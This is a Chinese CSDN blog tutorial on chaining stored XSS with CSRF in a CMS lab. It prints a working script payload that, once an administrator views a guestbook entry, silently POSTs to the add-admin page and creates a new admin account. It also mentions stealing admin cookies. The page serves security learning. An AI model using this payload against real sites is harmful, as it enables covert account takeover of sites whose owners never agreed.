XSS+CSRF组合拳

最新推荐文章于 2024-06-22 12:36:33 发布
最新推荐文章于 2024-06-22 12:36:33 发布
阅读量504 收藏 9
点赞数 9
文章标签: xss csrf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/139814850
版权

目录

简介

如何进行实战

进入后台创建一个新用户进行接口分析

构造注入代码

寻找XSS漏洞并注入

小结

简介

(案例中将使用cms靶场来进行演示)

在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情 。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合 。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。

如何通过js发起请求,具体来说有以下步骤

  1. 创建 XMLHttpRequest 实例

  2. 发出 HTTP 请求

  3. 接收服务器传回的数据

  4. 更新网页数据

如何进行实战

  1. 分析功能点的请求接口,构造恶意请求(创建网站后台管理员账密)

  2. 编写发起恶意请求的恶意JS

  3. 寻找XSS漏洞

  4. 使用恶意的JS进行XSS攻击 

进入后台创建一个新用户进行接口分析

构造注入代码

根据刚刚抓到的包构造创建一个新管理员的代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","添加管理员的页面",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

寻找XSS漏洞并注入

载我安装的cms中发现有留言板尝试注入,将刚刚编写好的注入代码插入到输入框,留言页面的输入框都可以尝试注入

留言成功

 现在我们到后台模拟管理员审核

(现在是没有管理员的)

 管理员查看留言

现在再看管理员界面发现多了一个管理员正是我们模拟创建的管理员

小结

你的xss漏洞打到网站后台,并不一定要添加管理员,你也可以抓取管理员的cookie。本次攻击的最大工臣还是xss漏洞,没有xss漏洞这次攻击是无从谈起的。

这个漏洞在如今已经已经几乎不存在了,因为csrf很好防御。

不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

板栗妖怪
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 2865
该篇文章记录了xss+csrf组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
xss+csrf组合拳这么玩
yggcwhat
05-28 885
xss+csrf组合拳这么玩
漏洞组合拳XSS+CSRF记录
金色%夕阳的博客
08-20 592
漏洞组合拳XSS+CSRF记录 0x00 前言 0x01 靶场环境 0x02 组合拳思路 0x03 【第一拳】存储型 XSS + CSRF 1、构造 POC 2、 开工 0x04 【第二拳】CSRF + SelfXSS 1、构造 POC 0x05 总结
xss+csrf组合拳
wo41ge的博客
12-16 3095
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
跨站攻击(XSS+CSRF).docx
01-05
1. 能理解XSS注入原理; 2. 能应用Low等级、Medium等级、High级别的XSS; 3. 能理解XSS的修复。 4. 能从攻击者角度、受害者角度描述CSRF; 5. 能应用Low等级、Medium等级的CSRF实现; 6. 能摸索High级别的CSRF实现;...
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
xss反射存储型的+csrf+html注入老网站的练习源码
详解XSSCSRF简述及预防措施
10-17
主要介绍了XSSCSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
XSSCSRF两种跨站攻击总结
02-26
但是,历史同样悠久的XSSCSRF却没有远离我们。由于之前已经对XSS很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过Tidy之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免...
TokenBasedUnsafe:一个展示XSSCSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT中的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSSCSRF攻击是如何发生的。
Pikachu靶场--XSS
qq_65150735的博客
06-17 1108
Pikachu靶场--XSS跨站脚本
XSS漏洞—XSS平台搭建与打cookie
goldfish8848的博客
06-21 1451
6. **避免内联事件**:避免在HTML中使用内联JavaScript事件处理器,如 `onLoad="onload('{{data}}')"` 或 `onClick="go('{{action}}')"`,因为这些容易受到XSS攻击。7. **避免拼接HTML**:前端采用拼接HTML的方法比较危险,如果可能,使用 `createElement`、`setAttribute` 等方法实现,或者采用成熟的渲染框架,如Vue或React。攻击者可能会尝试使用不同的字符编码或分隔符来绕过简单的输入验证。
XSS跨站脚本攻击对网站有哪些危害
weixin_68778384的博客
06-19 548
XSS跨站脚本攻击是一种典型的Web程序漏洞利用攻击。攻击者利用Web程序对用户输入检查不足的漏洞,将可执行恶意脚本注入网站或Web应用。当用户访问这些被注入恶意脚本的网页时,恶意脚本会在用户的浏览器中执行,从而达到窃取用户个人数据、弹出广告、篡改网页内容等攻击目的。为了防范XSS跨站脚本攻击,网站开发者需要采取一系列的安全措施,如对用户输入进行严格的验证和过滤、设置安全的HTTP响应头部、使用安全的编码实践等。同时,定期更新和打补丁也是防止新发现的安全漏洞被利用的重要手段。
xss-lab靶场的level15-level20
qq_64775230的博客
06-17 207
点我进入下一关
xss初识(xss-lab)
weixin_72202802的博客
06-21 753
XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(CascadingStyle Sheets) 重名,所以改为XSSXSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器XSS就是指通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网页中,使用户浏览器加载并执行攻击者制造的恶意代码,以达到攻击的效果。
Web渗透-CSRF跨站请求伪造
最新发布
WolvenSec的博客
06-22 1204
跨站请求伪造(Cross-Site Request Forgery,CSRF)是一种网络攻击,通过利用受害者的身份认证状态在不知情的情况下执行恶意操作。通常,这种攻击会诱使用户点击恶意链接或访问一个特制的网站,从而触发不被用户所知的请求,导致用户意图之外的行为,如更改用户设置、转账等。
CSRF跨站请求伪造
q
06-18 444
按住ctrl点击CheckHTTPRefererValid,HTTP_REFERER函数是获取referer头的,如果referer为空的话就执行成功。这个数据包构造好了之后,点击这个html,如果该用户刚好登录了这个cms的后台并且有权限增加用户那么就会成功创建一个admin用户。成功添加,但是这个并没有什么用,因为被攻击者不会主动去修改referfer头。在生成的poc头部加上这个使其数据包自动将referer头去空。放包后成功添加,因为代码逻辑就是为空就是True。2、无过滤防护,有过滤防护能绕过。
CSRF绕过
墨痕诉清风的博客
06-20 155
1. 替换referer为url,如果header已有则不替换,例172.16.12.129为url,查看返回值是否包含cookie,cookie中存在SameSite字段,包含则表示SameSite标志cookie检测到了。3. 替换referer为主机外的地址,有cookie再次请求,查看返回值是否包含cookie,cookie中存在SameSite字段,包含则表示SameSite标志cookie检测到了。3. 删除整个token,尝试请求查看返回状态码,200、300则起作用,否则篡改无效。
xss+csrf组合拳
09-20
XSSCSRF是两种常见的网络安全漏洞。当它们结合在一起时,会构成一种更加危险的攻击方式,被称为"XSS CSRF组合拳"。下面是一种可能的攻击方式: 1. 攻击者在恶意网站B中插入CSRF payload,并使用该CSRF payload修改用户在A网站的昵称为XSS payload。 2. 攻击者诱使用户访问恶意网站B,触发CSRF payload,导致用户在A网站的昵称被修改为XSS payload。 3. 当用户重新访问A网站时,XSS payload会被触发,从而获取到用户的Cookie信息。 为了防御这种攻击,可以采取以下措施: 1. 在服务端对用户输入进行严格的过滤和验证,特别是在对用户输入进行展示的地方,避免将用户输入作为代码执行。 2. 对于敏感操作,使用CSRF Token来验证请求的合法性。确保每个请求都包含一个随机生成的Token,并在服务端验证该Token的有效性。 3. 在Cookie中使用HttpOnly属性,以防止JavaScript通过document.cookie来获取Cookie信息。 4. 设置合适的Content Security Policy (CSP)来限制页面中可以加载的资源和代码。 以上是一种常见的XSS CSRF组合拳攻击方式以及相应的防御措施,但仍然有其他的攻击方式和防御策略。建议综合使用多种防御措施以提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值